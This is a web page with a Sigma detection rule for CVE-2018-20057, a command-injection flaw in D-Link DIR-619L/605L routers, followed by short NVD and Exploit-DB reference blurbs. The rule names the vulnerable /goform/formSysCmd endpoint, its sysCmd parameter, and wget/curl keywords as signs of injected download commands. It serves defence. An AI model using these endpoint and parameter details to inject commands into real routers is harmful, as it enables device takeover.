CVE-2018-20057

Sep 24, 2021 ·

Detection of CVE-2018-20057 observed from our Honeypots

Sigma rule (View on GitHub)

 1title: CVE-2018-20057
 2status: experimental
 3description: Detection of CVE-2018-20057 observed from our Honeypots
 4references:
 5  - https://nvd.nist.gov/vuln/detail/CVE-2018-20057
 6  - https://www.exploit-db.com/exploits/47031
 7author: Loginsoft Research Unit
 8date: 2021/09/01
 9logsource:
10  product: D-Link DIR-619L Rev.B 2.06B1 and DIR-605L Rev.B 2.12B1
11  category: Router
12detection:
13  selection:
14    c-uri: "/goform/formSysCmd"
15    cs-method: "POST"
16    c-uri-query: "sysCmd="
17  keywords1:
18    - "&apply=Apply&submit-url=/syscmd.asp&msg="
19  keywords2:
20    - "wget"
21    - "curl"
22  condition: selection and keywords1 and keywords2
23level: High

References

NVD - CVE-2018-20057

An issue was discovered in /bin/boa on D-Link DIR-619L Rev.B 2.06B1 and DIR-605L Rev.B 2.12B1 devices. goform/formSysCmd allows remote authenticated users to execute arbitrary OS commands via the s...

Read More
OffSec’s Exploit Database Archive

SAPIDO RB-1732 - Remote Command Execution.. remote exploit for Hardware platform

Read More

CVE-2018-20057

Sigma rule (View on GitHub)

References

NVD - CVE-2018-20057

OffSec’s Exploit Database Archive